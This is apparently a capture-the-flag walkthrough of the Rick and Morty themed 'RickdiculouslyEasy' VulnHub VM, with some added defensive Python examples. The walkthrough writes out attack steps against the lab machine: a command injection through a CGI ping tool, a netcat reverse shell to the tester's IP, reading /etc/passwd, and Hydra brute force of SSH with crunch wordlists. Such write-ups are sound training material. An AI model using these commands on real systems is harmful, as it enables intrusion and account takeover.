So here is some information about the challenge from the creator:
This is a Fedora server VM, created with VirtualBox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.
It’s designed to be a beginner ctf, if you’re new to pen testing, check it out!
https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
Some feedback from me before you start reading!
This image is perfect for beginners or students.
It is themed on the Rick & Morty series. I am a huge fan, so I really enjoyed it, but even if you don't watch the series you will definitely have fun. But seriously, start the series.
Interesting challenges that are connected to each other and cover a variety of fields and tools.
Generally a really, really fun boot2root to play, maybe one of the best I have ever played.
DO YOURSELF A FAVOR AND PLAY IT. DON'T TAKE TOO MANY SNEAK PEEKS. IT'S PRETTY DO-ABLE
Starting with an Nmap scan
nmap -sS -sU -T4 -A -v 192.168.2.2
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.2.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh?
| fingerprint-strings:
|   NULL:
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp   open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods:
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp open  http    Cockpit web service
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Did not follow redirect to https://192.168.2.2:9090/
Let's connect to the FTP service
ftp 192.168.2.2
Connected to 192.168.2.2.
220 (vsFTPd 3.0.3)
Name (192.168.2.2:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp>
POINTS: 10
POINTS_TO_GO: 120
vsftpd 3.0.3: no vulnerabilities found with searchsploit.
We could brute force, but not for now.
Let's try to log in with SSH on port 22
ssh 192.168.2.2
ssh_exchange_identification: Connection closed by remote host
Nothing we can do. Also, Nmap identified no version.
Let's move on to port 80
nikto -h 192.168.2.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.2
+ Target Hostname:    192.168.2.2
+ Target Port:        80
+ Start Time:         2019-01-08 14:52:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Fedora)
+ Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8327 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2019-01-08 14:52:40 (GMT-5) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Let's open 192.168.2.2 in the browser
Nothing interesting in the page source or in the image.
Let's view /passwords
We got another flag
POINTS: 20
POINTS_TO_GO: 110
Let's open http://192.168.2.2/passwords/passwords.html
Opening the source reveals a password: “winter”
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
Moving to robots.txt
view-source:http://192.168.2.2/cgi-bin/root_shell.cgi
<html><head><title>Root Shell </title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>
I guess Rick is messing with us. That was way too good to be true. 😒
Moving to http://192.168.2.2/cgi-bin/tracertool.cgi
A super cool web page to ping IPs.
When we try 127.0.0.1 we get a response.
Let's try to add another command after the ping
e.g.: 127.0.0.1; id;
DAAAMN Morty 😍, the command is successfully executed and we got a text result back.
So now we actually have a stupid but perfectly working shell.
Everything we type after 127.0.0.1; will be executed.
So testing the following commands to take a look at the directories did not return anything useful.
127.0.0.1; ls;
127.0.0.1; cd ..; ls;
127.0.0.1; cd ..; cd ..; ls;
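To see why "127.0.0.1; id;" works, here is an added Python example of mine (not code from the VM and not the source of tracertool.cgi, which the writeup never shows): a vulnerable way of building the ping command, next to a hardened version that only accepts a literal IP address and never hands user input to a shell at all. The function names and the sample inputs are my own.

```python
import ipaddress
import subprocess

# Vulnerable shape (hypothetical reconstruction of the mistake a tracertool.cgi-
# style script makes): the user-supplied host is pasted into a command string
# that is later executed by a shell, so "127.0.0.1; id" also runs id.
def build_ping_command_vulnerable(host):
    return "ping -c 1 " + host  # shell metacharacters in host keep their meaning


# Hardened form, step 1: accept only something that parses as an IP address.
# ipaddress.ip_address() raises ValueError for anything else, including
# "127.0.0.1; id;", so the separator never gets near a command line.
def validate_ip(value):
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


# Hardened form, step 2: build an argv list instead of a string. With a list and
# no shell involved, ";" would just be part of one argument (and has already
# been rejected by validate_ip anyway).
def build_ping_argv(host):
    ip = validate_ip(host)
    if ip is None:
        raise ValueError("not an IP address: %r" % host)
    return ["ping", "-c", "1", ip]


def run_ping(host):
    """Run the hardened ping and return its exit code and output."""
    proc = subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, check=False)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    for candidate in ("127.0.0.1", "127.0.0.1; id;"):
        print(candidate, "->", validate_ip(candidate))
```

The two changes are independent and both matter: input validation stops junk at the door, and the argv form means that even a validation bug would not turn into command execution, because nothing is interpreting the string as shell syntax.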
Funny thing, the cat command has been replaced with an ASCII cat! Well that made me laugh! 😂😂
Then I had an idea. Can I ping my machine?
And yes I can!
So let's open a basic remote shell.
I use netcat to start listening on port 4444
nc -lvp 4444
Then I craft the new malicious “ping” command with netcat to connect back to my IP:PORT with /bin/bash
127.0.0.1; nc 192.168.2.9 4444 -e /bin/bash;
And I immediately get a shell back on my machine. 😎
So we got a shell that is running as the user apache.
Tried to find other interesting files or directories for flags, but with no luck.
We will return here really soon.
Let's view port 9090
And we got another flag
POINTS: 30
POINTS_TO_GO: 100
No hints in the code. The web page seems broken.
So far I have captured a few flags, found a password, “winter”, that I never had the chance to use, and got a reverse shell as the low-privileged user “apache”.
Ok, so here I got stuck, even if it is a beginner, RICKdiculouslyEasy machine.
Pretty embarrassing I know.😭
So I Googled other write-ups and tried to take only a sneak peek without spoiling everything.
And I found that my Nmap scan had failed massively. I had missed really important ports.
Let's scan again, this time more carefully. (The -p- parameter scans all ports, 1 to 65535.)
nmap -sS 192.168.2.2 -p-
Well that was painful to watch. 😱😱
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:22 EST
Nmap scan report for 192.168.2.2 (192.168.2.2)
Host is up (0.00058s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
9090/tcp  open  zeus-admin
13337/tcp open  unknown
22222/tcp open  easyengine
60000/tcp open  unknown
Let's do some service identification on the ports I previously missed.
nmap -sS 192.168.2.2 -p 9090,13337,22222,60000 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:24 EST
Nmap scan report for 192.168.2.2 (192.168.2.2)
Host is up (0.00033s latency).

PORT      STATE SERVICE    VERSION
9090/tcp  open  http       Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh        OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.70%I=7%D=1/8%Time=5C351522%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.70%I=7%D=1/8%Time=5C351528%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\
SF:.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20rev
SF:erse\x20shell\.\.\.\n#\x20");
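The lesson here (a default nmap run only probes its top 1000 ports per protocol, so 13337, 22222 and 60000 were never touched by the first scan) is easy to check programmatically. Below is an added Python example of mine, not output of any tool the writeup uses: it parses the port table from nmap's normal output and reports which open ports a second, full-range scan found that the first one missed. The two embedded scan texts are constructed copies of the tables quoted above.

```python
import re

# Constructed sample input: the port tables from the writeup's first (default
# port range) and second (-p-) scans, trimmed to the lines that matter.
DEFAULT_SCAN = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp open  http    Cockpit web service
"""

FULL_SCAN = """\
Not shown: 65528 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
9090/tcp  open  zeus-admin
13337/tcp open  unknown
22222/tcp open  easyengine
60000/tcp open  unknown
"""

# One row of nmap's port table: "<port>/<proto>  <state>  <service> [version...]"
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def open_ports(nmap_text):
    """Return {(port, proto): service} for every row whose state is 'open'."""
    result = {}
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state") == "open":
            result[(int(m.group("port")), m.group("proto"))] = m.group("service")
    return result


def missed_ports(first_scan, second_scan):
    """Open ports reported by the second scan but absent from the first one."""
    first = open_ports(first_scan)
    second = open_ports(second_scan)
    return sorted(p for p in second if p not in first)


if __name__ == "__main__":
    for port, proto in missed_ports(DEFAULT_SCAN, FULL_SCAN):
        print("missed by the default scan: %d/%s" % (port, proto))
```

Running the comparison after every engagement (or every scan of your own hosts) is a cheap habit: services parked on unusual high ports are exactly the ones a default scan silently skips.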
We found another SSH service running on 22222, while 13337 and 60000 remain a mystery.
But we got a flag from the banner of the service on 13337
POINTS: 40
POINTS_TO_GO: 90
It also says something about a backdoor. Well that is convenient.
Let's telnet to 13337.
telnet 192.168.2.2 13337
Nope, nothing.
telnet 192.168.2.2 13337
Trying 192.168.2.2...
Connected to 192.168.2.2.
Escape character is '^]'.
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connection closed by foreign host.
Moving on to port 60000
This port was interesting from the beginning, as we got this strange but exciting string from the Nmap banner grab.
“Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\.\n#\x20”
nc 192.168.2.2 60000
Thank you Rick! You might be a super genius asshole but I guess you kinda suck at InfoSec.
ls returns another flag
POINTS: 50
POINTS_TO_GO: 80
Let's run whoami
OMG Ricky! You filthy irresponsible animal! 😱😂😂
We are root but strangely can't change directory. ls returns only flag.txt
I can't escape the blackhole directory. I guess the name is not random at all.
Let's move on to port 22222
Tried to connect as root:
ssh root@192.168.2.2 -p 22222
The only password I know is winter.
No luck.
The good thing is that now we have an SSH service that at least accepts connections. (Port 22 was refusing any connection.)
Maybe this password is for another user. I have to find other users. Other users are listed in /etc/passwd.
How am I going to access this file?
Back to my netcat shell I opened in the terminal, which runs as apache.
cat /etc/passwd
That fucking cat again. I totally forgot it.
I need another simple program to read the content. nano and vim won't work as I am connected through a plain nc shell.
I know that head shows the top lines of a text file, but new users are usually located at the bottom of the passwd file.
So I use less
less /etc/passwd
Hell yeah!👌
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
Let's try them on port 22222
ssh RickSanchez@192.168.2.2 -p 22222
RickSanchez@192.168.2.2's password:
Permission denied, please try again.
ssh Morty@192.168.2.2 -p 22222
Morty@192.168.2.2's password:
Permission denied, please try again.
ssh Summer@192.168.2.2 -p 22222
Summer@192.168.2.2's password:
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[Summer@desktop-7f9m85h ~]$
ls reveals another flag.
POINTS: 60
POINTS_TO_GO: 70
Ohhh I get it. Summer & Winter 👀
So this is getting really interesting.
Starting with Morty's home directory, I want to download his files to my local machine, so I use scp.
scp -P 22222 Summer@192.168.2.2:/home/Morty/Safe_Password.jpg /root/Downloads/Morty
and again
scp -P 22222 Summer@192.168.2.2:/home/Morty/journal.txt.zip /root/Downloads/Morty
journal.txt.zip is password protected. No idea what the password is, but I guess those two files are connected, so maybe the password is in the Safe_Password.jpg file.
Here is the image; nothing shows up at first sight. I guess it is time for some steganography.
I don't know much about steg, so I Googled and found some tools like exiftool, steghide and stegosuite
No luck with exiftool
No luck with steghide
No luck with stegosuite
I even manually zoomed in on Rick's teeth to find a secret password. Nothing 😩
Stuck again.
Googled, again.
strings Safe_Password.jpg
Successfully unzipped journal.txt.zip with the password “Meeseek”
And we got another flag!
POINTS: 80
POINTS_TO_GO: 50
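For anyone wondering what strings actually found: a common way to hide text in a JPEG is simply to append it after the End-Of-Image marker (FF D9), where image viewers ignore it but strings does not. Here is an added Python example of mine (not a tool from the writeup; the embedded image bytes and the appended text are constructed, not the real Safe_Password.jpg) that carves out anything after the last EOI marker and implements a minimal strings(1) over the data.

```python
import re

JPEG_SOI = b"\xff\xd8"  # Start Of Image marker
JPEG_EOI = b"\xff\xd9"  # End Of Image marker: viewers stop reading here

# Constructed sample: a minimal JFIF header, some filler, the EOI marker, and
# then text appended after the image ends (the "password in a picture" trick).
# The appended sentence is made up for this example.
SAMPLE_JPEG = (
    JPEG_SOI
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\x00" * 32
    + JPEG_EOI
    + b"\n\nThe Safe Password: Meeseek\n"
)


def trailing_data(data):
    """Return the bytes after the last EOI marker (b'' for a clean JPEG).

    rfind is used because EXIF thumbnails can contain their own FF D9; the
    trade-off is that trailing data which itself contains FF D9 is truncated.
    """
    if not data.startswith(JPEG_SOI):
        raise ValueError("not a JPEG (missing SOI marker)")
    idx = data.rfind(JPEG_EOI)
    if idx == -1:
        raise ValueError("no EOI marker found")
    return data[idx + len(JPEG_EOI):]


def strings(data, min_len=4):
    """Minimal strings(1): runs of printable ASCII at least min_len long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def suspicious_trailer(data, min_len=4):
    """Printable strings found only after EOI; non-empty means appended data."""
    return strings(trailing_data(data), min_len)


if __name__ == "__main__":
    print("all strings:     ", strings(SAMPLE_JPEG))
    print("after EOI marker:", suspicious_trailer(SAMPLE_JPEG))
```

Checking for bytes after EOI is a quick first triage step before reaching for steghide and friends: a clean JPEG returns an empty trailer, and anything else is worth reading.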
So now moving to the /home/RickSanchez directory to download his files to our local machine.
scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/ThisDoesntContainAnyFlags/NotAFlag.txt /root/Downloads/Rick
scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/RICKS_SAFE/safe /root/Downloads/Rick
So NotAFlag.txt is actually not a flag, even if I am not really convinced yet. So let's keep
The file safe seems like an executable. Maybe I should try to run it on Rick's server.
So it is actually an executable, but I cannot run it.
I tried the su command, but Summer is apparently not in the sudoers group.
Summer doesn't have the proper permissions to execute the file, but we don't really care because we have already downloaded it to our host machine.
So it says something about arguments. So we have to pass an argument to the executable, and I am pretty sure that would be the password.
After a few tries I opened the file with a previous flag. That safe remember? 😁
And by passing the password as an argument we successfully ran the safe.
POINTS: 100
POINTS_TO_GO: 30
So this is a password reminder for Rick.
We have to understand what he means by that.
Huge fan of the series, but I don't remember his band (sorry Rick 😋).
But god bless Google
So it is called “The Flesh Curtains” LOL
Here is a poster
Let's follow his directions and make the password. Probably the root password, from what he says.
1 uppercase character
1 digit
One of the words in my old bands name.
So we have to create a wordlist: [one uppercase letter A-Z][one digit 0-9][“The” or “Flesh” or “Curtains”]
Let's use crunch. I Googled A LOT to find out how I can create the appropriate wordlist.
There are multiple methods but this one seemed to me the easiest one.
crunch 5 5 -t ,%The > the_wordlist.txt
crunch 7 7 -t ,%Flesh > flesh_wordlist.txt
crunch 10 10 -t ,%Curtains > curtains_wordlist.txt
And verifying the results
Let's fire up Hydra to brute force
hydra -l root -P the_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l root -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l root -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
Starting to freak out…😧
hydra -l RickSanchez -P the_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l RickSanchez -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l RickSanchez -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222
SUCCESS! P7Curtains is the password
Now let's connect.
FINALLY!
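From the defender's side this step is very noisy: the pattern Rick describes gives only 26 × 10 × 3 = 780 candidates, but every guess Hydra makes is a separate failed login in sshd's log, and the successful one lands right after the burst. The added Python example below (my own code, not anything from the VM) parses constructed sshd log lines in the syslog/secure format, flags sources with many failures, and flags the more telling case of a success that follows a run of failures for the same source and user. The log lines, hostname and PIDs are constructed.

```python
import re
from collections import Counter

# Constructed sample of sshd log lines (not taken from the target): a burst of
# failures from one source, first for root, then for RickSanchez, followed by
# a success for RickSanchez, plus an unrelated key-based login by Summer.
SAMPLE_AUTH_LOG = """\
Jan  8 16:40:01 desktop sshd[2101]: Failed password for root from 192.168.2.9 port 50110 ssh2
Jan  8 16:40:01 desktop sshd[2102]: Failed password for root from 192.168.2.9 port 50111 ssh2
Jan  8 16:40:02 desktop sshd[2103]: Failed password for RickSanchez from 192.168.2.9 port 50112 ssh2
Jan  8 16:40:02 desktop sshd[2104]: Failed password for RickSanchez from 192.168.2.9 port 50113 ssh2
Jan  8 16:40:02 desktop sshd[2105]: Failed password for RickSanchez from 192.168.2.9 port 50114 ssh2
Jan  8 16:40:03 desktop sshd[2106]: Failed password for RickSanchez from 192.168.2.9 port 50115 ssh2
Jan  8 16:40:03 desktop sshd[2107]: Accepted password for RickSanchez from 192.168.2.9 port 50116 ssh2
Jan  8 16:41:10 desktop sshd[2150]: Accepted publickey for Summer from 192.168.2.50 port 41000 ssh2
"""

# Matches both "Failed password for <user>" and "Accepted publickey for <user>";
# "invalid user" is skipped so unknown usernames still get attributed.
AUTH_LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_auth(log_text):
    """Turn sshd log lines into dicts with result, method, user and src."""
    events = []
    for line in log_text.splitlines():
        m = AUTH_LINE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def brute_force_sources(log_text, threshold=5):
    """Source IPs with at least `threshold` failed logins across all users."""
    fails = Counter(e["src"] for e in parse_auth(log_text) if e["result"] == "Failed")
    return {src: n for src, n in fails.items() if n >= threshold}


def success_after_failures(log_text, min_failures=3):
    """(src, user) pairs whose login succeeded after >= min_failures failures.

    A single success preceded by a run of failures for the same account from
    the same source is the signature of a brute force that worked, which is a
    far stronger alert than the failure count alone.
    """
    fails = Counter()
    hits = []
    for e in parse_auth(log_text):
        key = (e["src"], e["user"])
        if e["result"] == "Failed":
            fails[key] += 1
        elif fails[key] >= min_failures:
            hits.append(key)
    return hits


if __name__ == "__main__":
    print("noisy sources:        ", brute_force_sources(SAMPLE_AUTH_LOG))
    print("success after failures:", success_after_failures(SAMPLE_AUTH_LOG))
```

The thresholds are deliberately low for the sample; on a real host tune them to your baseline, and remember that a wordlist this small finishes in seconds, so rate limiting or a lockout policy (fail2ban, sshd's MaxAuthTries, or disabling password authentication altogether) is what actually stops it.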
Now Rick mentioned that “sudo is wheely good!”
Let's try the su command again. And success, we are root and found the last flag.
POINTS: 130
POINTS_TO_GO: 0
——————————————
Lessons learned:
1) I should be more careful with port scanning.
2) I should practice more on steg.